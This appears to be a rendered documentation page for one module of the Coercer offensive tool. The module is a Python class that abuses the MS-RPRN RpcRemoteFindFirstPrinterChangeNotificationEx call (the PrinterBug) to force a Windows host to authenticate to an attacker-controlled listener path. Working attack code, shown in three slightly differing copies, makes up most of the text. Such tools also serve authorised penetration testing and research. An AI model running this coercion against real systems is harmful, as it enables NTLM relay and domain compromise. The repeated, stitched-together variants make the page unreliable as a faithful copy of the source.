coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotificationEx
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : RpcRemoteFindFirstPrinterChangeNotificationEx.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5.dtypes import NULL


class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
    """
    Coerce a machine into authenticating by calling RpcRemoteFindFirstPrinterChangeNotificationEx
    (opnum 65) of [MS-RPRN]: Print System Remote Protocol
    (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d).

    Method found by:
        -
    """

    # (transport, path template) pairs; "{{listener}}" is presumably filled in
    # by the base class before the value reaches self.path — confirm there.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00'),
    ]

    # Endpoints the call can be reached on, keyed by RPC transport.
    # NOTE(review): the first key is spelled "ncan_np" while the second uses
    # the "ncacn_" prefix; confirm which spelling the framework looks up
    # before changing either.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0",
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0",
            },
        ],
    }

    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN",
    }

    # The argument that carries the attacker-controlled path is pszLocalMachine.
    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotificationEx",
        "opnum": 65,
        "vulnerable_arguments": ["pszLocalMachine"],
    }

    def trigger(self, dcerpc_session, target):
        """Issue the RPC call over an already-bound DCERPC session.

        Args:
            dcerpc_session: the bound session; None means connect() was never
                called.
            target: name or address of the print server, used to open the
                printer handle the notification request refers to.

        Returns:
            "" when the request was sent without raising, the caught exception
            object when any step failed, and None (after printing an error)
            when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            # The notification request needs a printer handle on the target.
            opened = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
            request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
            request['hPrinter'] = opened['pHandle']
            request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # self.path is the value listed in function["vulnerable_arguments"].
            request['pszLocalMachine'] = self.path
            request['pOptions'] = NULL
            dcerpc_session.request(request)
        except Exception as err:
            # Any failure is handed back to the caller rather than raised.
            return err
        return ""
class
RpcRemoteFindFirstPrinterChangeNotificationEx(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
    """
    Coerce a machine into authenticating by calling RpcRemoteFindFirstPrinterChangeNotificationEx
    (opnum 65) of [MS-RPRN]: Print System Remote Protocol
    (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d).

    Method found by:
        -
    """

    # (transport, path template) pairs; "{{listener}}" is presumably replaced
    # by the base class before the value reaches self.path — confirm there.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00'),
    ]

    # Endpoints per RPC transport.
    # NOTE(review): "ncan_np" differs from the "ncacn_" prefix used by the
    # second key; confirm which spelling the framework expects.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0",
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0",
            },
        ],
    }

    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN",
    }

    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotificationEx",
        "opnum": 65,
        "vulnerable_arguments": ["pszLocalMachine"],
    }

    def trigger(self, dcerpc_session, target):
        """Send the notification request through *dcerpc_session*.

        Args:
            dcerpc_session: bound session, or None when connect() was not called.
            target: print server name or address used to open the printer handle.

        Returns:
            "" on a request that did not raise, the caught exception object on
            failure, or None (with an error printed) when there is no session.
        """
        if dcerpc_session is not None:
            try:
                handle = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)['pHandle']
                call = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
                call['hPrinter'] = handle
                call['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
                # pszLocalMachine is the argument named in function["vulnerable_arguments"].
                call['pszLocalMachine'] = self.path
                call['pOptions'] = NULL
                dcerpc_session.request(call)
            except Exception as err:
                return err
            else:
                return ""
        print("[!] Error: dce is None, you must call connect() first.")
        return None
Coerces a machine into authenticating by calling function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)
Method found by: -
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
function =
{'name': 'RpcRemoteFindFirstPrinterChangeNotificationEx', 'opnum': 65, 'vulnerable_arguments': ['pszLocalMachine']}
def
trigger(self, dcerpc_session, target):
def trigger(self, dcerpc_session, target):
    """Send the RpcRemoteFindFirstPrinterChangeNotificationEx request.

    Args:
        dcerpc_session: bound DCERPC session; None if connect() was never called.
        target: print server name or address used to open the printer handle.

    Returns:
        "" when the request went out without raising, the caught exception
        object on any failure, or None (after printing an error) when no
        session was given.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        printer = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
        # self.path is the value of the argument listed as vulnerable
        # (pszLocalMachine) in the class' function table.
        fields = {
            'hPrinter': printer['pHandle'],
            'fdwFlags': rprn.PRINTER_CHANGE_ADD_JOB,
            'pszLocalMachine': self.path,
            'pOptions': NULL,
        }
        call = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
        for name, value in fields.items():
            call[name] = value
        dcerpc_session.request(call)
    except Exception as err:
        # Failures are returned to the caller instead of propagating.
        return err
    return ""